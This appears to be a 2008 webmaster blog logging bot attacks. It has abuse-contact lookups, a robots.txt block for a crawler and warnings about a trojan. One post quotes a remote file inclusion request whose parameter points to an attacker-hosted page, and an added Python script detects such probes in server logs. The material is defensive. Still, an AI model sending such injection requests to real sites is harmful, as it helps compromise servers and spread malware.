Nov 20, 2008

babycaleb.mvhosted.com hacker attacks

Baby hacker has moved to http://babycaleb.mvhosted.com

And his baby bots are now trying to inject this new URL into websites.
The site, when inspected using Spam Spade to avoid any virus infection, shows the exploit is in the HTML just like before.

A search shows it has infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com


Send abuse messages to theplanet.com

Nov 12, 2008

itsapic.com/crawler.html another beta

208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx


This bot was scanning webring looking for sites and got blocked by BB, so watch for it.
The website does not say what it's doing or ask permission to enter your site.


Add to robots.txt:
User-agent: itsapic.com_crawler
Disallow: /

Nov 8, 2008

babycaleb.fortunecity.co.uk hacker now shut down.

Am getting a lot of these requests lately

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPs, all trying to remote load this page. Inside that page is a hack attempt. AVG gives an alarm if you try to view the source.
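
An added example, not part of the original post: one way to find the requests described above in a web server log, by flagging any query-string parameter whose value is itself a URL and counting the distinct source IPs per remote host. The log lines are constructed (combined log format, documentation IP ranges), and the `/index.php?page=` request in the last line is a made-up stand-in.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [08/Nov/2008:10:01:02 +0000] "GET /shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm HTTP/1.1" 404 210 "-" "-"
198.51.100.7 - - [08/Nov/2008:10:03:40 +0000] "GET /shop/catalog/product_info.php?cPath=http%3A%2F%2Fbabycaleb.fortunecity.co.uk%2Findex.htm HTTP/1.1" 404 210 "-" "-"
203.0.113.5 - - [08/Nov/2008:10:05:11 +0000] "GET /shop/catalog/product_info.php?cPath=3_17 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [20/Nov/2008:09:00:00 +0000] "GET /index.php?page=http://babycaleb.mvhosted.com HTTP/1.1" 404 210 "-" "-"
"""

# Client IP is the first field; the request target sits inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a URL scheme is the remote-include pattern.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_probes(log_text):
    """Return {remote_host: {"ips": set, "params": set}} for every request
    whose query-string value is itself a URL."""
    hits = defaultdict(lambda: {"ips": set(), "params": set()})
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = urlsplit(target).query
        # parse_qsl percent-decodes once; unquote again for double-encoded values.
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = unquote(value)
            if REMOTE_URL_RE.match(value):
                host = (urlsplit(value.strip()).hostname or "").lower()
                hits[host]["ips"].add(ip)
                hits[host]["params"].add(name)
    return dict(hits)


if __name__ == "__main__":
    for host, info in sorted(find_rfi_probes(SAMPLE_LOG).items()):
        print(f"{host}: {len(info['ips'])} source IPs, "
              f"params={sorted(info['params'])}")
```

The normal catalogue request (`cPath=3_17`) is not reported, while both the plain and the percent-encoded form of the injected URL are grouped under the same remote host.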

Do not go to the website babycaleb.fortunecity.co.uk. AVG detects a virus but it still gets into your system. Look for:
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox

--updated-
The site has now been shutdown.

A search of Google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this attack and they are allowing the attack to spread. Perhaps they are involved in the attack?